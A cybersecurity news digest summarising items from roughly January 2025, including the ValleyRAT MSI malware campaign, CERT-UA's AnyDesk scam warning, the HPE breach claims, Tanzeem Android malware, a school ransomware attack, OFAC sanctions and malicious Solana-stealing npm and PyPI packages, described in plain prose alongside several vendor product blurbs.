Daily Brief

HackGATE introduces a gateway solution to provide unprecedented visibility and control in penetration testing, addressing common industry frustrations. Survey indicates 60% of security professionals find it challenging to measure the success of penetration tests, with 65% relying solely on vendor-provided information. Traditional pentest reports often leave gaps in understanding, leading to unresolved questions about the scope and thoroughness of security tests. HackGATE offers real-time visibility, showing detailed security testing traffic and techniques, enhancing tracking and transparency in the testing process. The platform supports ethical hacking with guidelines like OWASP, ensuring tests adhere to high quality and thorough coverage standards. A centralized dashboard consolidates data, making it easier for stakeholders to monitor progress and understand key metrics in ethical hacking activities. Enhanced coordination across globally distributed teams is achieved through a unified interface that ensures consistency and adherence to standards. HackGATE pushes for a shift from "Trust but Verify" to a more empirical, data-driven verification approach in penetration testing accountability and compliance.

The upcoming webinar, scheduled for January 23, 2025, will address the transition from reactive to proactive security measures in the digital landscape. Vileen Dhutia from Rubrik and Tim Phillips from The Register will present innovative strategies for enhancing organizational security postures. The session aims to help organizations identify and mitigate security vulnerabilities before they can be exploited. Discussions will include building resilient systems capable of adapting to new threats and creating a security-first culture within organizations. The webinar intends to transform security from being seen as a cost center to a key business enabler. Practical advice will be offered on implementing effective proactive security strategies to safeguard assets and support business growth. Participation in the webinar requires prior registration, which is currently open.

Cybersecurity experts have identified a malware campaign targeting Chinese-speaking areas such as Hong Kong, Taiwan, and Mainland China utilizing ValleyRAT malware. The malware is delivered through counterfeit Microsoft Installer (MSI) packages, masquerading as legitimate software. The deceptive MSI package employs Windows Installer's CustomAction feature to run malicious code and deploy a benign-looking application to mask its activities. The malware payload is concealed within an encrypted archive that is extracted using a hardcoded password, revealing components including a rogue DLL and two image files for executing the malware. ValleyRAT functions as a remote access trojan (RAT), granting attackers unauthorized control over affected devices with capabilities such as screenshot capture and event log deletion. The threat group associated with these attacks, identified as Silver Fox, has tactical similarities with another group, Void Arachne, and utilizes a command-and-control framework known as Winos 4.0. The malign campaign leverages legitimate software as a delivery channel, integrating the malware with regular applications to avoid detection and enhance its efficacy.

The Ukrainian Computer Emergency Response Team (CERT-UA) has issued a warning about cyber scams involving fake AnyDesk audit requests purportedly for security evaluations. Attackers impersonate CERT-UA through misleading AnyDesk connection requests, exploiting user trust for unauthorized access. For a successful attack, AnyDesk needs to be pre-installed on the victim’s system and the attacker must possess the target's AnyDesk identifier. CERT-UA highlighted that legitimate use of remote access tools like AnyDesk only occurs with prior agreement through formally approved channels. The State Service for Special Communications and Information Protection of Ukraine reported detecting over 1,042 cyber incidents in 2024, with most involving malicious code and intrusions. Notably, threat clusters named UAC-0010, UAC-0050, and UAC-0006 were most active, associated with espionage, financial theft, and psychological operations respectively. Ukrainian CERT-UA suggests only enabling remote access tools when in use and ensuring coordination through official communication paths to mitigate risks. There were also cyber activities against Russia aiming to steal data and disrupt operations, involving different cyber threat actors and techniques.

APAC banks are heavily investing in AI, driving impressive revenue growth and transforming customer engagement and operations. Over 80% of banks use AI for customer interaction, with significant applications in fraud detection, credit scoring, and personalized services. Rapid AI adoption has outstripped the development of necessary security measures, posing risks to data privacy and compliance with stringent regulations. The use of open-source components and third-party APIs in AI applications introduces vulnerabilities, complicating supply chain security. SecOps and data teams often work in silos, leading to gaps in governance and security applied late in AI application development. Banks face challenges like model poisoning and data leakage, highlighting the need for security frameworks tailored to AI. Strategies such as "AI SecOps" and phased rollouts are recommended to embed security throughout the AI lifecycle, ensuring both innovation and compliance. Collaboration with cybersecurity experts and the use of AI in enhancing security protocols are essential for maintaining innovation without compromising security.

Hewlett Packard Enterprise (HPE) is probing allegations by a hacker group named IntelBroker claiming they have stolen HPE's source code and other sensitive data. IntelBroker asserts they accessed HPE's API, GitHub repositories, and acquired private keys, certificates, and Docker builds. While HPE has not found proof of a security breach, they have implemented their cyber response protocols, which include disabling affected credentials. The hacker group has a history of high-profile breaches, including attacks on DC Health Link and major firms such as Nokia and Cisco. IntelBroker recently offered for sale an archive of data they allege was taken from HPE nearly a year ago, suggesting prolonged unauthorized access. HPE confirmed previous breaches by state-sponsored groups, including an incident in 2023 with APT29, tied to Russian intelligence. No current evidence suggests that the alleged breach has impacted HPE's operational capabilities or customer data.

The U.S. Naval War College hosted a wargame to simulate potential cyber-attacks on Taiwan by China, considering the island's bid for UN recognition as an independent state by 2030. Experts and hackers at Black Hat and DEF CON were tasked with identifying weaknesses in Taiwan’s critical infrastructure, focusing on cyber strategies in response to both cyber and physical threats from China. Participants developed 65 recommendations to bolster Taiwan’s infrastructure resilience, highlighting vulnerabilities like Taiwan's reliance on internet cables routed through China. The wargaming scenarios covered the drastic impacts on power, communications, and internet infrastructure, with discussions on alternative technologies like satellite communications and Bluetooth mesh networks. The exercise suggested multiple strategies including decentralizing critical infrastructure, stockpiling essential equipment, and training civilians in cybersecurity and network repair. Notable points included Taiwan's potential use of cultural artifacts to protect critical sites and the ongoing efforts to replace nuclear power with renewable energy sources under security considerations. Taiwanese officials are engaged and showed interest in conducting further, more private wargame sessions in Taiwan to refine defensive strategies.

New research identifies significant vulnerabilities in several tunneling protocols, which may allow exploitation through unverified sender identities. Over 4.2 million devices, including VPN servers, ISP routers, and CDN nodes, are vulnerable across countries like China, France, and the USA. Attackers can use these security gaps to create one-way proxies and conduct damaging denial-of-service (DoS) attacks. Vulnerable protocols include IP6IP6, GRE6, 4in6, and 6in4; they lack essential security measures like Internet Protocol Security (IPsec), leaving them open to attack. The identified vulnerabilities have been assigned CVE identifiers, highlighting the recognized threats and emphasizing the need for immediate remedial actions. Recommended defensive actions include the use of protocols such as IPSec or WireGuard for encryption, implementing strict traffic filtering, and conducting deep packet inspections. The possible impacts of such attacks include severe network congestion, disruption of services, and potential for further exploitations like man-in-the-middle attacks.

The cybersecurity firm Cyfirma discovered a new Android malware named Tanzeem, deployed by DoNot Team, in targeted cyberattacks aimed at intelligence collection. Tanzeem, named after the Urdu word for "organization," was found in fake chat applications in October and December 2024, featuring similar functionalities with minor UI changes. The malware fails to function as a legitimate app, closing after acquiring necessary user permissions to potentially start malicious activities. DoNot Team, suspected of Indian origins, has historically engaged in cyber espionage using spear-phishing and Android malware to gather sensitive intelligence. The malware misuses the OneSignal platform to send push notifications possibly containing phishing links, leading to further malware installation. Upon installation, the app presents a bogus chat interface that prompts users to enable accessibility services, which then allows the malware to access sensitive permissions and data. The malware capabilities include tracking call logs, contacts, messages, location details, and external storage contents; it also features screen recording and connects to a C2 server. The use of push notifications for malware distribution highlights an evolution in DoNot Team’s tactics, potentially indicating ongoing and future espionage activities.

Sweden has deployed warships in the Baltic Sea to protect against sabotage of undersea cables, crucial for global energy and data flow. This move follows Sweden's recent entry into NATO, driven by increasing Russian activities that threaten regional security. The strategic deployment aims to deter covert operations, such as cable cutting, by ensuring military presence and surveillance. Historical context highlighted by the "Whiskey On The Rocks" incident in 1981, where Sweden's military effectively challenged Soviet naval maneuvers. Sweden's proactive defense and surveillance measures underscore its commitment to protect its territorial waters and critical infrastructure. The article suggests that robust international policies and cooperation are needed to secure undersea cables as strategic international assets. Emphasizes the importance of clear rules and consequences to prevent disruptions to the undersea infrastructure, which supports global connectivity.

A UK high school in Chester was forced to close due to a ransomware attack on January 17, impacting its operations for at least two days. Blacon High School has transitioned to remote learning using Google Classroom while the premises remain partially accessible for lunch collection. No ransomware group has claimed responsibility for the attack, and the school has not confirmed if any data was compromised. School operations are severely affected, with many IT systems down and phone services disrupted; a temporary phone line has been set up. Headteacher Rachel Hudson stated that an independent cybersecurity company is investigating the incident to determine the specifics of the breach. This incident follows another major ransomware attack on Gateshead Council by the Medusa gang, emphasizing increasing cyber threats to the UK public sector. Discussions are ongoing within the UK government about potentially banning ransom payments by public sector and critical infrastructure bodies. Upcoming government report to address the vulnerability of public sector IT systems due to outdated technology and lack of adequate funding.

The U.S. Treasury's Office of Foreign Assets Control (OFAC) issued sanctions against Chinese and North Korean entities involved in cybersecurity threats. Sichuan Juxinhe Network Technology Co., LTD., and Yin Kecheng, a Shanghai cyber actor, were sanctioned due to links with Salt Typhoon and Silk Typhoon threat clusters. Kecheng was implicated in a cybersecurity breach of the Treasury's network earlier in the month. Additional sanctions targeted individuals and organizations related to a North Korean IT worker scheme aimed at generating revenue for the country through fraudulent employment abroad. The digital landscape's growing complexity necessitates an understanding of how cybersecurity intersects with national security and diplomacy. A practical guide was highlighted, offering 10 best practices to boost visibility and security in cloud computing environments. Recent cybersecurity vulnerabilities were listed across diverse software and systems, emphasizing the need for timely updates and proactive threat management.

Satori provides comprehensive data security across all types of data within an organization, including operational and semi-structured data. The platform secures the data lifecycle from creation in production environments to usage in AI models, addressing gaps in legacy data security solutions. Satori supports fine-grained access control on BI tools, enhancing security over platforms that leave such implementation solely to security teams. Features continuous data discovery, classification, and monitoring, aiding in robust Data Activity Monitoring across multiple data stores. Implements real-time automation for data security tasks such as policy enforcement and access control, even on platforms that do not natively support advanced access controls like RBAC and ABAC. Enables dynamic data masking and controlled, temporary data access to minimize the risks of sensitive data exposure. Provides detailed visibility into data access and usage through enriched audit logs and customized reports compatible with major platforms. Employs a proactive approach to data security, moving beyond mere risk mapping to active mitigation through enhanced security measures and controls.

Sage Group plc temporarily suspended its AI assistant, Sage Copilot, after it mistakenly shared customer data between users. The issue was identified when a customer noticed that the AI was displaying invoices from other customer accounts. The company described the incident as a "minor issue" and affirmed that no GDPR-sensitive data or invoices were leaked. The AI system was taken offline for a few hours to investigate and implement a necessary fix. Sage Copilot, an AI-based tool designed for handling administrative tasks in accounting, was released under early access to a limited user base. This incident adds to a series of AI-driven errors reported across various industries, emphasizing challenges in AI accuracy and reliability. Sage reassured that the issue affected only a small number of customers and that corrective measures have been successfully implemented.

Cybersecurity researchers have uncovered malicious npm and PyPI packages designed to steal Solana wallet keys and sensitive data. The packages, such as solana-transaction-toolkit and solana-stable-web-huks, mislead users by mimicking legitimate Solana development tools, but actually drain wallets by transferring funds to attacker-controlled addresses. Malicious code is transmitted using Gmail's SMTP servers, exploiting the trusted status of Gmail to avoid detection by cybersecurity defenses. Additional functionality discovered in some packages includes a "kill switch" that can delete project files and exfiltrate environment variables. Malicious GitHub repositories were also identified as part of a broader strategy to target developers on platforms like GitHub, further spreading the attack vector. Researchers noted this campaign targets not just npm users but extends to Python developers, with certain packages aimed at capturing Discord authentication tokens. Security incidents like these highlight the ongoing risk of supply chain attacks where attackers infiltrate legitimate software distribution channels to distribute malware.